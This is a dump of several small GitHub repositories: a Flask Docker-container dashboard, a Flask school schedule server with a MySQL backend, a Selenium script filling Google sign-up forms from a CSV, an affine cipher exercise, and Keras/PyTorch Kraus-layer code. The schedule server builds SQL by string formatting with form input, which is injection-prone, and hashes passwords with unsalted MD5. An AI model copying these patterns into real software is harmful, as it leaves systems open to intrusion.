"FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "service nginx restart\nuwsgi uwsgi.ini\n" }, { "alpha_fraction": 0.7162162065505981, "alphanum_fraction": 0.7364864945411682, "avg_line_length": 17.5, "blob_id": "ab5df0af09acbc436323f5b85477570a656b35ed", "content_id": "99d1dbdf4e166850531da4b233957a0984accdb1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 148, "license_type": "permissive", "max_line_length": 25, "num_lines": 8, "path": "/uwsgi.ini", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "[uwsgi]\nwsgi-file = app.py\nsingle-interpreter = true\nenable-threads = true\nmaster = true\ncallable = app\nsocket = /tmp/flask.sock\nchmod-socket = 666\n" }, { "alpha_fraction": 0.5619946122169495, "alphanum_fraction": 0.5717654824256897, "avg_line_length": 36.099998474121094, "blob_id": "3bfbf7ce394fd5ddefa1b1f154561527a5e654bd", "content_id": "052e7956b5d8162e72feae517c2095519e8156c9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2968, "license_type": "permissive", "max_line_length": 116, "num_lines": 80, "path": "/app.py", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "import time\n\nimport requests\nfrom docker import Client\nfrom flask import Flask, jsonify, render_template\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\n\napp = Flask(__name__)\nlimiter = Limiter(\n app,\n key_func=get_remote_address,\n default_limits=[\"200 per day\", \"50 per hour\"]\n)\n\n\ndef ip():\n return requests.get('http://ifconfig.me/ip').text.strip()\n\n\[email protected](\"200 per hour\")\[email protected]('/json')\ndef json(name=None):\n start = time.time()\n host = Client(base_url='unix://var/run/docker.sock')\n print('\\nprocess time:', time.time() - start, '\\n')\n return jsonify(host.containers(all=True))\n\n\[email protected](\"200 per hour\")\[email protected]('/<name>')\ndef template(name=None):\n start = time.time()\n host = Client(base_url='unix://var/run/docker.sock')\n host_containers = host.containers(all=True)\n all_containers = [container['Names'][0].replace('/', '') for container in host_containers]\n all_user_containers = [container for container in all_containers if '_' in container]\n # -----------------------------------------------------------------------------------------------\n user_list = set([container.split('_')[0] for container in all_user_containers])\n if name in user_list:\n specific_user_containers = [container for container in all_containers if name in container]\n else:\n specific_user_containers = list()\n # -----------------------------------------------------------------------------------------------\n names = [container.pop('Names')[0].replace('/', '') for container in host_containers]\n api = dict(zip(names, host_containers))\n new_api = api.copy()\n for container_name in api:\n if container_name not in specific_user_containers:\n del new_api[container_name]\n del api, all_user_containers, specific_user_containers, all_containers\n\n for container, data in new_api.items():\n context = list()\n ports = sorted(data['Ports'], key=lambda p: p['PrivatePort'])\n\n for port in ports:\n private_port = port.get('PrivatePort')\n public_port = port.get('PublicPort')\n public = ''\n if port.get('IP') != None:\n public = f\"{port['IP']}:{public_port}->\"\n private = f\"{port['Type']}/{private_port}, \"\n NAT = public + private\n if private_port != 8888 and private_port != 6080:\n context.append(NAT)\n else:\n new_api[container]['jupyter_link'] = f'http://{ip()}:{public_port}'\n new_api[container]['jupyter_text'] = NAT[:-2]\n\n new_api[container]['Ports'] = ''.join(context)\n running = 0\n for i in new_api:\n if new_api[i]['State'] == 'running':\n running += 1\n return render_template('index.html', name=name, running=running, total=len(new_api), containers=new_api.items())\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n" }, { "alpha_fraction": 0.6897233128547668, "alphanum_fraction": 0.695652186870575, "avg_line_length": 25.63157844543457, "blob_id": "694db2f2e19e06446dbc8f3fe93261fef426fef1", "content_id": "1bf26546815faef9e656187cb2a190dae2f94c97", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 506, "license_type": "permissive", "max_line_length": 79, "num_lines": 19, "path": "/Dockerfile", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "FROM python:3.6.9-stretch\n\n# Set the working directory to /app\nWORKDIR /flask\n\n# Copy the current directory contents into the container at /app \nADD . /flask\n\n# Install the dependencies\nRUN pip install -r requirements.txt && \\\n apt update && \\\n apt install nginx -y &&\\\n cp flaskconfig /etc/nginx/sites-available/ && \\\n ln -s /etc/nginx/sites-available/flaskconfig /etc/nginx/sites-enabled/ && \\\n rm /etc/nginx/sites-enabled/default\n\n\n# run the command to start uWSGI\nCMD [\"sh\", \"start.sh\"]\n" }, { "alpha_fraction": 0.5360824465751648, "alphanum_fraction": 0.7010309100151062, "avg_line_length": 15.166666984558105, "blob_id": "7cd145ab7a6ccb206903e212945ad1fb2e5e0a9e", "content_id": "8857eeb15f4d339ed01bc19bc890a0bb4a3b3f79", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 97, "license_type": "permissive", "max_line_length": 20, "num_lines": 6, "path": "/requirements.txt", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "docker-py==1.10.6\nFlask==1.1.2\nFlask-Cache==0.13.1\nFlask-Caching==1.9.0\nFlask-Limiter==1.4\nuwsgi\n" }, { "alpha_fraction": 0.6616161465644836, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 21.05555534362793, "blob_id": "b7ecd0507acf539e89658ade898780897a3a1566", "content_id": "25bd3ad8571098006ba8933ac069b545130a4dcb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 396, "license_type": "permissive", "max_line_length": 129, "num_lines": 18, "path": "/README.md", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "# DgxInfo\nUser's Docker container information\n\nhttps://hub.docker.com/r/falconjk/dgxinfo\n\n![](https://i.imgur.com/UZgCNUR.png)\n## Used\n* docker-py \n* Flask\n* uWSGI\n* NGINX\n\n## docker run command\n`docker run -idt --restart=always --cpus=2 --name dgxinfo -v /var/run/docker.sock:/var/run/docker.sock -p 80:80 falconjk/dgxinfo`\n\n## Connect \n* http://{ip}/{username}\n* example: http://192.168.0.2/bob" } ]
7
FroHenK/PTLScheduleServer
https://github.com/FroHenK/PTLScheduleServer
7dd2bbe727564e094a07e1143f3d1eec1e53ef3a
e7dc55fc72926ffc8c6514464fe82a11f4922253
3ab7d387f3ff1b59314aa42b968d5f81ebaa685c
refs/heads/master
2016-08-12T23:06:15.568629
2015-12-16T07:16:15
2015-12-16T07:16:15
47,759,559
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6256204843521118, "alphanum_fraction": 0.6326661109924316, "avg_line_length": 29.169082641601562, "blob_id": "e60209d928a07831c11af532677d0f5ed3898454", "content_id": "d35768b8f3ad13e8298cefce6a567b2a807c4edf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6245, "license_type": "no_license", "max_line_length": 132, "num_lines": 207, "path": "/mysqlclient.py", "repo_name": "FroHenK/PTLScheduleServer", "src_encoding": "UTF-8", "text": "__author__ = 'Alexey Maksimov (FroHenK)'\nimport os\nimport mysql\nfrom datetime import datetime\nfrom mysql.connector import (connection)\n\n\nclass Grade:\n def __init__(self, id, title):\n self.title = title\n self.id = id\n\n\nclass DayElement:\n def __init__(self, id, grade_id, date, subject_id, subject_name):\n self.subject_name = subject_name\n self.subject_id = subject_id\n self.date = date\n self.grade_id = grade_id\n self.id = id\n\n\nclass Homework:\n def __init__(self, id, grade_id, subject_id, data):\n self.subject_id = subject_id\n self.grade_id = grade_id\n self.data = data\n self.id = id\n\n\nclass Subject:\n def __init__(self, id, title):\n self.title = title\n self.id = id\n\n\nMYSQL_HOST = os.environ.get('OPENSHIFT_MYSQL_DB_HOST', '127.0.0.1')\nMYSQL_USER = os.environ.get('OPENSHIFT_MYSQL_DB_USERNAME', 'root')\nMYSQL_PASSWORD = os.environ.get('OPENSHIFT_MYSQL_DB_PASSWORD', '')\nMYSQL_PORT = os.environ.get('OPENSHIFT_MYSQL_DB_PORT', 3306)\nMYSQL_DB = 'ptl'\n\ncnx = connection.MySQLConnection(user=MYSQL_USER, password=MYSQL_PASSWORD,\n host=MYSQL_HOST,\n database=MYSQL_DB, charset='utf8')\n\ncurs = cnx.cursor(buffered=True)\n\n\ndef get_all_grades(): # Get grades from DB\n curs.execute('SELECT * FROM grade')\n res = curs.fetchall()\n\n grades_array = []\n for (id, title) in res:\n grades_array.append(Grade(int(id), str(title.decode(\"utf8\"))))\n return grades_array\n\n\ndef get_homeworks(grade_id2, subject_id2): # get homeworks by grade and subject\n id_ = 'SELECT * FROM homework WHERE grade_id=%s AND subject_id=%s ORDER BY id DESC' % (grade_id2, subject_id2)\n\n curs.execute(id_)\n\n res = curs.fetchall()\n\n homeworks_array = []\n for (id, grade_id, subject_id, data) in res:\n homeworks_array.append(Homework(int(id), grade_id, subject_id, str(data.decode(\"utf8\"))))\n return homeworks_array\n\n\ndef get_all_homeworks(): # get all homeworks\n id_ = 'SELECT * FROM homework'\n\n curs.execute(id_)\n\n res = curs.fetchall()\n\n homeworks_array = []\n for (id, grade_id, subject_id, data) in res:\n homeworks_array.append(Homework(int(id), grade_id, subject_id, str(data.decode(\"utf8\"))))\n return homeworks_array\n\n\ndef create_day_element_db(grade_id, datetime, subject_id): # create day element\n insert_command = 'INSERT INTO day_element (grade_id, date, subject_id) VALUES (%s,\\'%s\\',%s)' % (\n grade_id, datetime.strftime('%Y-%m-%d %H:%M:00'), subject_id)\n curs.execute(insert_command)\n cnx.commit()\n\n\ndef is_valid_admin(username, password_md5): # is there admin with those login/pass\n id_ = 'SELECT * FROM admins WHERE username=\\'%s\\' AND password=\\'%s\\'' % (username, password_md5)\n curs.execute(id_)\n if not curs.fetchone():\n return False\n return True\n\n\ndef add_homework_db(grade_id, subject_id, data): # create and add homework to DB\n insert_command = 'INSERT INTO homework (grade_id, subject_id, data) VALUES (%s,%s,\\'%s\\')' % (\n grade_id, subject_id, data)\n curs.execute(insert_command)\n cnx.commit()\n\n\ndef add_grade_db(title): # create and add homework to DB\n insert_command = 'INSERT INTO grade (title) VALUES (\\'%s\\')' % title\n curs.execute(insert_command)\n cnx.commit()\n\n\n\ndef add_subject_db(title): # create and add homework to DB\n insert_command = 'INSERT INTO subject (title) VALUES (\\'%s\\')' % (title)\n curs.execute(insert_command)\n cnx.commit()\n\n\ndef get_day_db(grade_id, date): # get day elements by grade and date\n elements_array = []\n command = 'SELECT * FROM day_element WHERE grade_id = %s AND date BETWEEN \\'%s 00:00:00\\' AND \\'%s 23:59:59\\' ORDER BY date' % (\n grade_id, date.strftime('%Y-%m-%d'), date.strftime('%Y-%m-%d'))\n curs.execute(command)\n res = curs.fetchall()\n for (id, grade_id, date, subject_id) in res:\n curs.execute('SELECT title FROM subject WHERE id=%s' % subject_id)\n title = curs.fetchone()[0]\n elements_array.append(DayElement(id, grade_id, date, subject_id, str(title.decode('utf8'))))\n\n return elements_array\n\n\ndef get_all_day_db(): # get all day elements\n elements_array = []\n command = 'SELECT * FROM day_element'\n curs.execute(command)\n res = curs.fetchall()\n for (id, grade_id, date, subject_id) in res:\n curs.execute('SELECT title FROM subject WHERE id=%s' % subject_id)\n title = curs.fetchone()[0]\n elements_array.append(DayElement(id, grade_id, date, subject_id, str(title.decode('utf8'))))\n\n return elements_array\n\n\ndef get_homework_id(id): # get homework by id\n id_ = 'SELECT * FROM homework WHERE id=%s' % (id)\n\n curs.execute(id_)\n\n res = curs.fetchall()\n\n homeworks_array = []\n for (id, grade_id, subject_id, data) in res:\n homeworks_array.append(Homework(int(id), grade_id, subject_id, str(data.decode(\"utf8\"))))\n return homeworks_array[0]\n\n\ndef delete_day_db_id(id): # delete day element by id\n\n command = 'DELETE FROM day_element WHERE id=%s' % id\n\n curs.execute(command)\n cnx.commit()\n\n\ndef delete_subject_id(id): # delete subject by id\n\n command = 'DELETE FROM subject WHERE id=%s' % id\n curs.execute(command)\n cnx.commit()\n\n\ndef delete_homework_id(id): # delete hw by id\n\n command = 'DELETE FROM homework WHERE id=%s' % id\n\n curs.execute(command)\n cnx.commit()\n\n\ndef get_day_db_id(id): # delete day element by id\n elements_array = []\n command = 'SELECT * FROM day_element WHERE id=%s' % id\n curs.execute(command)\n res = curs.fetchall()\n for (id, grade_id, date, subject_id) in res:\n curs.execute('SELECT title FROM subject WHERE id=%s' % subject_id)\n title = curs.fetchone()[0]\n elements_array.append(DayElement(id, grade_id, date, subject_id, str(title.decode('utf8'))))\n\n return elements_array[0]\n\n\ndef get_all_subjects(): # get all subjects\n curs.execute('SELECT * FROM subject')\n res = curs.fetchall()\n subjects_array = []\n for (id, title) in res:\n subjects_array.append(Subject(int(id), str(title.decode(\"utf8\"))))\n return subjects_array\n\n\ndef close_connection(): # not used\n cnx.close()\n" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 35, "blob_id": "32d7f6cf11e256a852a7decd8f914ab7819f45f0", "content_id": "e7d37eb3a594a72b7296051483b72f805e6d01ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 72, "license_type": "no_license", "max_line_length": 39, "num_lines": 2, "path": "/README.md", "repo_name": "FroHenK/PTLScheduleServer", "src_encoding": "UTF-8", "text": "Based on Flask microframework. \nLies on http://ptl-frohenk.rhcloud.com/\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6200000047683716, "avg_line_length": 29, "blob_id": "d3cef483e928d242d415536d33b2b477d65623da", "content_id": "ef0376add7c1a779a48ce26984367d6288d69aee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 300, "license_type": "no_license", "max_line_length": 66, "num_lines": 10, "path": "/setup.py", "repo_name": "FroHenK/PTLScheduleServer", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name='FlaskApp',\n version='1.0',\n description='PTL Schedule Flask app',\n author='Alex Maksimov',\n author_email='[email protected]',\n url='http://www.python.org/sigs/distutils-sig/',\n install_requires=['Flask>=0.10.1', 'mysql-connector-python'],\n )\n" }, { "alpha_fraction": 0.656739354133606, "alphanum_fraction": 0.6584280133247375, "avg_line_length": 29.29767417907715, "blob_id": "7c68df9a96fd362bcde474d2e83afb48925d5a86", "content_id": "0ea1a5c19a6284260a6f056cc8a852cb926003bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6519, "license_type": "no_license", "max_line_length": 120, "num_lines": 215, "path": "/flaskapp.py", "repo_name": "FroHenK/PTLScheduleServer", "src_encoding": "UTF-8", "text": "GUEST_LOCAL = 'Гость'\n__author__ = 'Alexey Maksimov (FroHenK)'\nimport os\nimport hashlib\nimport json\nfrom datetime import datetime, timedelta\n\nfrom mysqlclient import curs, cnx, get_all_grades, get_all_subjects, get_homeworks, is_valid_admin, add_homework_db, \\\n create_day_element_db, get_day_db, get_day_db_id, get_homework_id, delete_day_db_id, delete_homework_id, \\\n get_all_day_db, get_all_homeworks, add_subject_db, delete_subject_id, add_grade_db\n\nfrom flask import Flask, request, session, flash, url_for, redirect, \\\n render_template, abort, send_from_directory\n\napp = Flask(__name__)\n\napp.config.from_pyfile('flaskapp.cfg')\n\n\n# TODO refactor 'class' to 'grade'\n\[email protected]_processor\ndef template_imports(): # put things into table for template rendering\n res = {}\n\n res[\"grades_array\"] = get_all_grades()\n res[\"subjects_array\"] = get_all_subjects()\n res[\"timedelta\"] = timedelta\n return res\n\n\[email protected]('/set_grade/', methods=['POST']) # set user's grade\ndef set_grade():\n session['grade_selected_id'] = int(request.form['grade_id'])\n return redirect('/')\n\n\[email protected]('/logout/')\ndef logout():\n if not session['is_admin']:\n return not_enough_permissions()\n session['is_admin'] = False\n session['username'] = GUEST_LOCAL\n return redirect(url_for('index'))\n\n\[email protected]('/classes/')\ndef classes_admin():\n return render_template('classes_admin.html', classes_admin_active=True)\n\n\[email protected]('/add_grade/', methods=['POST'])\ndef add_grade():\n add_grade_db(request.form['title'])\n return redirect(url_for('classes_admin'))\n\n\[email protected]('/admin/')\ndef admin_panel():\n return render_template('admin_panel.html', admin_panel_active=True)\n\n\[email protected](\"/create_day_element/<string:usr_date>/\", methods=['POST'])\ndef create_day_element(usr_date):\n if not session['is_admin']:\n return not_enough_permissions()\n time_str = request.form['usr_time']\n subject_id = int(request.form['subject_id'])\n if len(time_str) == 0:\n time_str = '00:00'\n current_datetime = datetime.strptime(usr_date + ' ' + time_str, '%Y-%m-%d %H:%M')\n create_day_element_db(session['grade_selected_id'], current_datetime, subject_id)\n return redirect('/get_day/' + usr_date + \"/\")\n\n\[email protected]_request\ndef b_request():\n # lazy initializations\n if session.get('grade_selected_id') is None: # if none grade is selected\n session['grade_selected_id'] = 105 # FIXME bad code\n if session.get('is_admin') is None:\n session['is_admin'] = False\n if session.get('username') is None:\n session['username'] = GUEST_LOCAL\n\n\[email protected](\"/get_day/<string:usr_date>/\", methods=['GET'])\ndef get_homework(usr_date):\n current_datetime = datetime.strptime(usr_date, '%Y-%m-%d')\n\n day_db = get_day_db(session['grade_selected_id'], current_datetime)\n return render_template('schedule.html', day_elements_array=day_db, schedule_active=True,\n current_datetime=current_datetime)\n\n\[email protected](\"/delete_day_element/<int:id>\")\ndef delete_day_elem(id):\n if not session['is_admin']:\n return not_enough_permissions()\n day_element = get_day_db_id(id)\n delete_day_db_id(id)\n return redirect('/get_day/' + day_element.date.strftime('%Y-%m-%d'))\n\n\[email protected](\"/delete_homework/<int:id>\")\ndef delete_homework(id):\n if not session['is_admin']:\n return not_enough_permissions()\n day_element = get_homework_id(id)\n delete_homework_id(id)\n return redirect('/subjects/' + str(day_element.subject_id))\n\n\[email protected]('/login/', methods=['POST'])\ndef admin_login():\n s = str(hashlib.md5(str(request.form['password']).encode('utf8')).hexdigest())\n if not is_valid_admin(str(request.form['username']), s):\n return not_enough_permissions() # TODO make special login error page\n session['is_admin'] = True\n session['username'] = str(request.form['username'])\n return redirect('/')\n\n\[email protected]('/')\ndef index():\n current_datetime = datetime.now()\n return get_homework(current_datetime.strftime(\"%Y-%m-%d\"))\n\n\[email protected]('/subjects/')\ndef subjects_page():\n return render_template('subjects.html', subjects_active=True)\n\n\[email protected]('/add_homework/<int:grade_id>/<int:subject_id>/', methods=[\"POST\"])\ndef on_add_homework(grade_id, subject_id):\n if not session['is_admin']:\n return not_enough_permissions()\n\n add_homework_db(grade_id, subject_id, str(request.form['data']))\n\n return redirect('/subjects/%s' % subject_id)\n\n\[email protected]('/add_subject/', methods=[\"POST\"])\ndef add_subject():\n if not session['is_admin']:\n return not_enough_permissions()\n\n add_subject_db(str(request.form['title']))\n\n return redirect('/subjects/')\n\n\n# displays not enough permissions error page\ndef not_enough_permissions():\n return render_template('not_enough_permissions.html')\n\n\[email protected]('/delete_subject/<int:subject_id>/')\ndef remove_subject(subject_id):\n if not session['is_admin']:\n return not_enough_permissions()\n\n delete_subject_id(subject_id)\n return redirect(url_for('subjects_page'))\n\n\[email protected]('/subjects/<int:subject_id>/')\ndef draw_subject(subject_id):\n return render_template('homeworks.html', subjects_active=True, subject_id=subject_id,\n homeworks_array=get_homeworks(session['grade_selected_id'], subject_id))\n\n\[email protected]('/project/')\ndef about_project():\n return render_template('project.html', project_active=True)\n\n\[email protected]('/<path:resource>')\ndef serve_static_resource(resource):\n return send_from_directory('static/', resource)\n\n\nclass JCalendar: # how java's calendar looks in JSON\n def __init__(self, year, month, dayOfMonth, hourOfDay, minute, second):\n self.year = year\n self.month = month - 1\n self.dayOfMonth = dayOfMonth\n self.hourOfDay = hourOfDay\n self.minute = minute\n self.second = second\n\n\ndef encode_b(obj): # JSON encode function\n if isinstance(obj, datetime):\n serial = JCalendar(obj.year, obj.month, obj.day, obj.hour, obj.minute, obj.second) # we need Java like calendar\n\n return serial.__dict__\n return obj.__dict__\n\n\[email protected](\"/get_json/\") # API for Java JSON\ndef json_api():\n json_data = {}\n json_data['grades'] = get_all_grades()\n json_data['subjects'] = get_all_subjects()\n json_data['homeworks'] = get_all_homeworks()\n json_data['day_elements'] = get_all_day_db()\n\n return json.dumps(json_data, default=encode_b)\n\n\nif __name__ == '__main__':\n app.run()\n" } ]
4
jroghair/Selenium-Programs
https://github.com/jroghair/Selenium-Programs
69e36d6c213342e4d85bbe0ba9dcffa310323a1d
3564ed2afd8e2d14eb86bce166aa910cb1e2f892
43475826ba9afc2d30e155bcc0ec08308faa054d
refs/heads/master
2020-05-18T21:48:53.171358
2019-05-03T00:12:39
2019-05-03T00:12:39
184,673,180
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7101910710334778, "alphanum_fraction": 0.728025496006012, "avg_line_length": 34.681819915771484, "blob_id": "f79c81cb75a3c30622a8345999202c20290d5920", "content_id": "3015c9d05218324be24f8aa4e4ed7cd8a125c10a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1570, "license_type": "no_license", "max_line_length": 175, "num_lines": 44, "path": "/GoogleAccountFillForm.py", "repo_name": "jroghair/Selenium-Programs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 02 00:02:17 2019\n\n@author: Jeremy Roghair\n\"\"\"\n\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport pandas as pd\n\n#users = pd.read_csv(\"C:\\\\Users\\\\jrogh\\\\OneDrive\\\\Documents\\\\RA Position - Sukul\\\\Question 2 - Scraper Output.csv\")\nos.chdir(os.getcwd())\n#Users.csv contains list of first/last names, emails and passwords\nusers = pd.read_csv(\"Users.csv\")\n\nchrome_driver_path = \"C:\\Program Files (x86)\\Google\\ChromeDriver\\chromedriver.exe\"\noptions = Options()\ndriver = webdriver.Chrome(chrome_driver_path, options=options)\n#Navigate to google account creation website\ndriver.get(\"https://accounts.google.com/signup/v2/webcreateaccount?continue=https%3A%2F%2Fwww.google.com%2F&hl=en&gmb=exp&biz=false&flowName=GlifWebSignIn&flowEntry=SignUp\") \n\n#Find the elements for all required fields\nfirst = driver.find_element_by_id('firstName')\nlast = driver.find_element_by_id('lastName')\nuserName = driver.find_element_by_id('username')\npw1 = driver.find_element_by_name('Passwd')\npw2 = driver.find_element_by_name('ConfirmPasswd')\n\n#Runs through list of users and fills the google account creation for each\nfor i in range(len(users)):\n first.send_keys(users.iloc[i]['First_Name'])\n last.send_keys(users.iloc[i]['Last_Name'])\n userName.send_keys(users.iloc[i]['Email'])\n pw1.send_keys(users.iloc[i]['Password'])\n pw2.send_keys(users.iloc[i]['Password'])\n sleep(2) \n first.clear()\n last.clear()\n userName.clear()\n pw1.clear()\n pw2.clear()\n" }, { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 30, "blob_id": "461c8769c2e77495df336f323ed008294e1435fc", "content_id": "e8a88e68d65c9bdb519e5baa37b91bcca1a05252", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 63, "license_type": "no_license", "max_line_length": 41, "num_lines": 2, "path": "/README.md", "repo_name": "jroghair/Selenium-Programs", "src_encoding": "UTF-8", "text": "# Selenium-Programs\nPrograms I've developed to learn selenium \n" } ]
2
ShadowproofGamer/zad75
https://github.com/ShadowproofGamer/zad75
e8f54dbfee4e210c1c5b9045cb9534e45028a02c
0e762b9f286a0a3f67d684c789e876f3a76c8050
934fa4e12d085d9931b942edcc1c5f9e2f42c3fa
refs/heads/master
2023-01-10T21:38:15.070170
2020-11-09T11:25:32
2020-11-09T11:25:32
311,316,262
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5435048937797546, "alphanum_fraction": 0.594975471496582, "avg_line_length": 29.811321258544922, "blob_id": "c6ae2dad69ac9d6ed61d5bc200d6e74fedf121c7", "content_id": "19ee0d3ed007e639af23174691ed2926722bd3e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 223, "num_lines": 53, "path": "/zad75.py", "repo_name": "ShadowproofGamer/zad75", "src_encoding": "UTF-8", "text": "slownik = {}\nfor i in range(97, 123):\n slownik[chr(i)] = (i-97)\n#print(slownik)\n\ndef podstawienie(litera, A, B):\n temp = slownik[litera]*A+B\n if temp>25:\n temp%=26\n #print(chr(temp+97))\n return chr(temp+97)\n\ndef szyfrowanie(slowo, A, B):\n slowo_szyfr = ''\n for i in slowo:\n slowo_szyfr+=podstawienie(i, A, B)\n return slowo_szyfr\n\ndef deszyfrowanie(slowo_szyfr, A, B):\n slowo = ''\n for i in slowo_szyfr:\n slowo+=podstawienie(i, A, B)\n return slowo\n\ndef znajdowanie_klucza(slowo1, slowo2):\n slowo1_len = len(slowo1)\n slowo2_len = len(slowo2)\n for A in range(0, 26):\n for B in range(0, 26):\n if podstawienie(slowo2[0], A, B) == slowo1[0] and podstawienie(slowo2[1], A, B) == slowo1[1] and podstawienie(slowo2[2], A, B) == slowo1[2] and podstawienie(slowo2[slowo2_len-1], A, B) == slowo1[slowo1_len-1]:\n print('klucz deszyfrujacy: A=', A, 'B=', B)\n elif podstawienie(slowo1[0], A, B) == slowo2[0] and podstawienie(slowo1[1], A, B) == slowo2[1] and podstawienie(slowo1[2], A, B) == slowo2[2] and podstawienie(slowo1[slowo1_len-1], A, B) == slowo2[slowo2_len-1]:\n print('klucz szyfrujacy: A=', A, 'B=', B)\n\nplik=open('tekst.txt')\ndane=plik.read().split()\nprint('punkt1:')\nfor i in dane:\n if i[0]==i[len(i)-1]:\n print(i)\n\nprint(\"punkt2:\")\nfor j in dane:\n if len(j)>=10:\n print(szyfrowanie(j, 5, 2))\n\nprint(\"punkt3:\")\nplik.close()\nplik2=open('probka.txt')\ndane2=plik2.read().split()\nfor k in range(0, len(dane2), 2):\n print(dane2[k], dane2[k+1])\n znajdowanie_klucza(dane2[k], dane2[k+1])" } ]
1
mofushaohua/partial_trace_kraus
https://github.com/mofushaohua/partial_trace_kraus
dd14bcc08c8018688772a849492c6d686894c4a5
b3fc610f32ffc2c9b0a57a10eb7400cbf585aebf
45e1b2ebac3bee9bf459b8947c2257b91bc87cd2
refs/heads/master
2023-03-20T09:05:41.546856
2020-07-03T11:37:09
2020-07-03T11:37:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5229007601737976, "alphanum_fraction": 0.5343511700630188, "avg_line_length": 24.354839324951172, "blob_id": "cfd1f59932453201f7d647cdacbec0f4cbff573d", "content_id": "6f8d7ceca6d66d5b3b0e66ae5372dbdbe6ac1b4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 786, "license_type": "no_license", "max_line_length": 54, "num_lines": 31, "path": "/util.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom time import time as time\nimport torch\n\ndef build_random_A(m,p,d, device = 'cpu'): \n A = torch.randn(m,p,d, device = device)\n A = A/torch.max(torch.abs(A))\n return A\n\ndef build_X(n,d, device = 'cpu'):\n \"\"\" create n input covariance matrix of size d x d\n from random matrix\n \"\"\"\n X = torch.zeros((n,d,d), device = device)\n for i in range(n):\n aux = torch.randn((d,d), device = device)\n X[i] = aux.t()@aux + torch.eye(d)*0.00\n return X\n\n\ndef build_Y(n,X,A, noise = 0 , device = 'cpu'):\n n = X.size(0)\n m = A.size(0)\n p = A.size(1)\n Y = torch.zeros((n,p,p), device = device)\n for i in range(n):\n for j in range(m):\n Y[i] += A[j]@X[i]@A[j].t()\n return Y\n" }, { "alpha_fraction": 0.6090794205665588, "alphanum_fraction": 0.6103404760360718, "avg_line_length": 27.296297073364258, "blob_id": "596640f9501605fe026107999ac85ef3f94d97ab", "content_id": "23c1573a85caff78af0c46d230ba74cbbdb268ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 78, "num_lines": 27, "path": "/PSDReluLayer.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n# projection to the nearest PSD matrix\r\n\r\nimport keras\r\nimport tensorflow as tf\r\nfrom keras.engine.topology import Layer\r\n\r\nclass PSDReluLayer(Layer):\r\n\r\n def __init__(self, eps, **kwargs):\r\n self.eps = eps\r\n super(PSDReluLayer, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n # Create a trainable weight variable for this layer.\r\n super(PSDReluLayer, self).build(input_shape)\r\n\r\n def call(self, x):\r\n\r\n s, u, v = tf.linalg.svd(x)\r\n a = tf.math.maximum(s, tf.multiply(self.eps, tf.ones_like(s)))\r\n x_relu = tf.matmul(u, tf.matmul(tf.linalg.diag(a), v, adjoint_b=True))\r\n return x_relu\r\n\r\n def compute_output_shape(self, input_shape):\r\n return input_shape\r\n\r\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.5903890132904053, "avg_line_length": 32.44736862182617, "blob_id": "022d5ba6ae3e8c92d2e5fa8e0aea003292a69778", "content_id": "50c64d82612922da479d37372a1ab515d4d7dbbc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 143, "num_lines": 38, "path": "/KrausLayer.py", "repo_name": "mofushaohua/partial_trace_kraus", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n\r\nfrom keras import backend as K\r\nfrom keras.engine.topology import Layer\r\nimport numpy as np\r\nfrom keras.regularizers import *\r\nfrom keras.initializers import *\r\nimport tensorflow as tf\r\n\r\nclass KrausLayer(Layer):\r\n\r\n def __init__(self, output_dim, rank, **kwargs):\r\n self.output_dim = output_dim\r\n self.rank = rank\r\n 